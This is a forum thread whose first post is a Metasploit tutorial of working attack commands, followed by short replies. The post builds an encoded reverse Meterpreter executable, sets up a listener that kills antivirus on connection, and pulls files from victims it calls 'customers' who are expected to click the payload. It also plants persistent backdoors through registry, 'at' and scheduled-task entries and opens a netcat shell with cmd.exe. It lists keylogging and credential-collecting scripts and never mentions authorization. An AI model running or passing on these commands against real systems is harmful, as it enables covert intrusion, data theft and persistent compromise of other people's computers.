Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Another TuT on metasploit. All my cheat notes :)

Hybrid View

  1. #1
    Junior Member
    Join Date
    Dec 2007
    Posts
    76

    Default Another TuT on metasploit. All my cheat notes :)

    I introduce my tutorial on the Metasploit Framework. This applys to both Linux and Windows.
    Although, I would seriously suggest using Metasploit within Linux, specifically
    'Backtrack 4 - PreRelease' (The Latest)


    If you dont know what the metasploit framework is, then look it up. You've been missing out.

    In no way is this meant to be a comprehensive guide. MSF is HUGE. Too many things can be done with it,
    you could write 15 books on it. MSF is Open Source and coded in the Ruby language.

    Get used to the 'help' option!

    PAYLOADs
    ========

    I'm gonna start with Payloads, many people know already that MSF is an exploitation framework, as in you can
    work out vulnerabilities in software, and use the framework to quickly create working exploits for it.
    There's hundreds of payloads that you can choose from, so that when you exploit the system in question
    you can easily automate the execution of a payload of your choice on the machine.

    I will show you how to turn those payloads into an actual .EXE so it will just run as is.

    Ok. Lets begin:


    Fire up your MSF, make sure it's updated, as they are constantly making amendments to this.
    For backtrack i think its : cd pentest/exploits/framework3

    Metasploit Double Encoded Reverse Meterpreter Payload
    ================================================== ===


    $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe

    LHOST - is our machine (listening host, as we are waiting for a connection from RHOST (remote host)

    LPORT - self explanitory. Just make sure you have port forwarding set up on your router ofcourse.

    Meterpreter - An incredibly advanced shell which kind of simulates bash. (even on a win system) - lots of power.
    You'll see how much power shorty.


    Now you have your PAYLOAD.exe

    Metasploit Listener
    ===================


    In /framework3 directory

    $ ./msfconsole
    (Takes a lil minute for this to load)

    use exploit/multi/handler (Sets the exploit to a handler)
    set PAYLOAD windows/meterpreter/reverse_tcp (Most common Payload to use, try experimenting with others)
    set LHOST 192.162.1.50 (Make sure you set LHOST to your address on Network and not localhost)
    set LPORT 82 (Sometimes, port 80, 443 or 8080 is better as to some FW's it looks less suspicious)
    set ExitOnSession false (As soon as you get a session, it doesn't automatically jump in to it)
    set AutoRunScript /killav.rb (when customer connects back, and meterpreter payload is uploaded, killav.rb script is uploaded and executed)
    exploit -j (sets exploit up as a job, good for shells on multiple customers)


    (See more on scripts... down )


    Continuation
    ============


    When all goes well, and you have hit 'exploit -j' and have waited for a customer to click on the payload.exe you created earlier
    you will see stuff happening in the screen. You will notice it run the killab script, then says something like :


    • Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)


    Ok, here's the basics:

    type :

    sessions -l (this lists any sessions we have i.e. customers. Notice the lowercase L )
    sessions -i 1 (this is to interact with the session 1. i.e. Interect. Lowercase I)

    If you need to come out of this screen. Either CTRL+Z or type 'background' without the ''


    Ok.. So we are in the session: Brilliant


    Continuation - The Good Stuff
    =============================


    $ Meterpreter > getuid (this will show you currently logged in user)
    $ Meterpreter > idletime (wanna see how long user has afk?)

    $ Meterpreter > help (this will show you a massive list of amzing commands to use!)
    $ Meterpreter > use priv (then check help again, more privilidged commands now eh?


    ok i will show some really handy ones


    $ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
    $ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)

    $ Meterpreter > cd "Documents and settings" (cd's to a folder with spaces in it.)
    $ Meterpreter > ls (this is an example of the bash type commands we have on the target win machine, version of dir)

    $ Meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire "My Docs" folder over to us.

    $ Meterpreter > execute *f evil.exe (executed the file on the customer)


    $ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
    (customer will not see a thing your doing as all the options are set properly)

    Check down the bottom for some useful cmd.exe commands that are very useful


    $ Meterpreter > uictl disable keyboard (disables some user interface componants)
    $ Meterpreter > uictl disable mouse
    $ Meterpreter > uictl enable keyboard (enables)

    $ Meterpreter > ps (this will show you a detailed list of all processes running on target machine)

    $ Meterpreter > migrate pid (migrates/injects itself into another process id) e.g migrate 716 (explorer.exe)
    $ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)


    etc etc etc etc....


    Using Payload As A Backdoor
    ===========================


    upload /home/metabkdr.exe metabkdr.exe (to app data directory)

    execute *-f cmd.exe *-c *-H -*i

    Way 1 :
    cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f

    (This adds a registry startup obviously)
    Way 2 :
    cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"

    (runs backdoor at 7pm all weekdays, at command works for all windows i think)

    way 3 :
    cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
    /TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Ins
    taller\metabkdr.exe" /ED 11/11/2011

    (This runs the backdoor every 45 mins as SYSTEM (on XP. XP home doesnt have schtask, has 'at' though)

    Plant A Simple Backdoor with Netcat
    ===================================


    plant a backdoor
    A very simple way of planting backdoor could be using netcat.
    steps:
    1. upload a netcat executable (nc.exe) on remote machine.
    meterpreter provides a command 'upload' for that
    2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
    3. now from your machine, type nc -v -n <ip address> <port>
    It will give you a command shell of remote machine

    nc -l -d -p 80 -e c:\windows\system32\cmd.exe


    More On Scripts:
    ================

    Scripts can be run from the meterpreter shell when you have a shell on a customer.

    All you do is: (where '$' is not to be typed. This is the bash shell)

    $ run scraper -h (This will show you the options etc for any of the scripts)
    or
    $ run keylogrecorder -h


    The Sky is your limit when it comes to scripts. You can code them to do all sorts of stuff for you.
    There are many already within the the framework, made by folk.. here's a small list of some already there:


    killav.rb (kills all anti viruses running on system)
    getcountermeasure.rb (kills av's and fw's/ids')
    scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored in /root/.msf3/
    gettelnet.rb (able to open a telnet server on the customer with a username and password)
    checkvm.rb (checks to see if it is a VM. And version numbers)


    netenum.rb
    search_dwld.rb
    winbf.rb
    credcollect.rb
    hostsedit.rb
    remotewinenum.rb
    keylogrecorder.rb
    scheduleme.rb
    winenum.rb
    getgui.rb
    schtasksabuse.rb
    wmic.rb
    get_local_subnets.rb
    migrate.rb


    Credits: backtrack forums / metasploit /irongeek

  2. #2
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default

    Congratulations !


  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    42

    Default

    Quite handy, thanks.

    I am feeling outdated on scripts part.

  4. #4
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63

    Default

    Great job keep it up.. >_<
    One day your life will flash before your eyes. Make sure its worth watching.

  5. #5
    Member Mr-Protocol's Avatar
    Join Date
    Jan 2010
    Location
    Ohio
    Posts
    142

    Default

    Great information. Thanks.

  6. #6
    Junior Member
    Join Date
    Sep 2009
    Posts
    43

    Default

    Good stuff, thank you!

  7. #7
    Just burned his ISO MacHacker's Avatar
    Join Date
    Apr 2008
    Location
    Andover, MA
    Posts
    1

    Default Great tutorial

    Thanks for the tutorial. very well detailed. Works great on my Virtual Machine running Windows XP SP3.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default Thanks

    Wow thanks man i was looking for something like this

  9. #9
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    11

    Default meterpreter transfering files

    hi there, i have not been able to get upload to work. i get error no such file or directory.
    Now is there anything else i need to do in bt4 ?
    i am trying to send files to a w2k sp4 wrk station i have 11 sessions open
    i have tried a few different versions of the upload command but none work.

    many thanks in advance
    also i could not tftp to bt4 to GET files either.

  10. #10
    Junior Member
    Join Date
    Feb 2010
    Location
    On Planet Earth
    Posts
    29

    Default

    thank you very much for this, but I've got two questions:-
    1)we must use port forwarding to our listener machine,right?
    2)why LHOST in the in the two commands differ?

    thanks...

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •